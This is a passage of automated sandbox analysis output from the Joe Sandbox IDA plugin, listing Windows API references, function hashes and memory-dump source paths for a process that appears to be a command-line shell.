                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3809306610-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 32f39e6056023f77b891d2fc324f48c2629355fc53235a1e7ae14facd8329ec9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08B16B66A08A4B81FB50AB15E45067DB7A1FB55B80FC58072DA4F877B0DFBDE442C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$iswdigit$wcstol
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3841054028-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: ca6420d5fdba69529132c57eae2cea415efa4969de5cacb53eefb84cfc01a183
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE51D226B0466B81FB68AB5594041BDA6A1FF68750BC88773DE5F432F4DFBCA441C220
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1533687
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7D151260D), ref: 00007FF7D15336A6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7D151260D), ref: 00007FF7D15336EB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1533703
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7D151260D), ref: 00007FF7D1533722
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$Write_get_osfhandle$Mode
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1066134489-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 739ea113db7b8f67668758fab7650505954dd704e5e7961a1ceb554f2bd9e5ee
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4518F26B0864B8AFBA56B21950457EE691EB45B90FC84436DE0F477B4DFBCE440CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 850181435-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0ba5561c39cb0703637671c1dbe0801599e515224e2f0d308e9bfb8045a321cf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC41B032608AC6CAEB709F20D8402EDB7A0FB89744FD54062DA4E47B64CF7CD145C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: _get_osfhandle.MSVCRT ref: 00007FF7D1523584
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D152359C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235C3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235D9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235ED
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D1523602
                                                                                                                                                                                                                                                                                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D1523514
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1523522
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D1523541
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D152355E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15236EC: _get_osfhandle.MSVCRT ref: 00007FF7D1523715
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15236EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7D1523770
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15236EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1523791
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4057327938-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f5fc170e214e881f99cea0fabfbe5265615ab8e2379f29c6985e7ceb24b228fa
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89316126B08A4B86F7947B25940007DFAA0EF89740FD841B7D94F873B5DFBCE8448660
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: KEYS$LIST$OFF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 411561164-4129271751
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5a5cd9169d0acb644468e003062e23938e809f2f8255e8309db0a2afc90e2e33
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E216020A0CA0B96FB54BB29A45517DE6A1EF84750FD09233C61F472F5DEFC94448760
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D15201C4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7D152E904,?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D15201D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF7D152E904,?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D1520212
                                                                                                                                                                                                                                                                                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7D152E904,?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D1520228
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF7D152E904,?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D152023C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7D152E904,?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D1520251
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 513048808-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1523584
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D152359C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235C3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235D9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235ED
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D1523602
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 513048808-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4104442557-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 15b6ed972d5416d79eac90ec8da7a322252691fe5da477b5a8b52c8d4c00e8d2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B115422B04B4A8AFB50EF61E84416C73A4F719758FD00A35EA6E47B64EFBCD2948350
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7D15371F9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7D153720D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7D1537300
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1535740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF7D15375C4,?,?,00000000,00007FF7D1536999,?,?,?,?,?,00007FF7D1528C39), ref: 00007FF7D1535744
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: OpenSemaphore$CloseErrorHandleLast
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: _p0$wil
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 455305043-1814513734
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c185ba3db837f3204d5a789c632b7c211f3ba25501763ef2bcfc242354807484
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B361A262F18A8B85FF61AB5594102BDA3A1EF84B80FD44433EA0F47765EFBCD5058320
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2401724867-3043279178
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: b1b4dbbed94fe83ace1ffe4ee83c7f8148ccfb1dc82a6876d8b1672479fb37ef
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8519F62B0868B85FB21AF21D8502BDB3A0EB49B94FD44176DA5F476B4EFBCD045C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
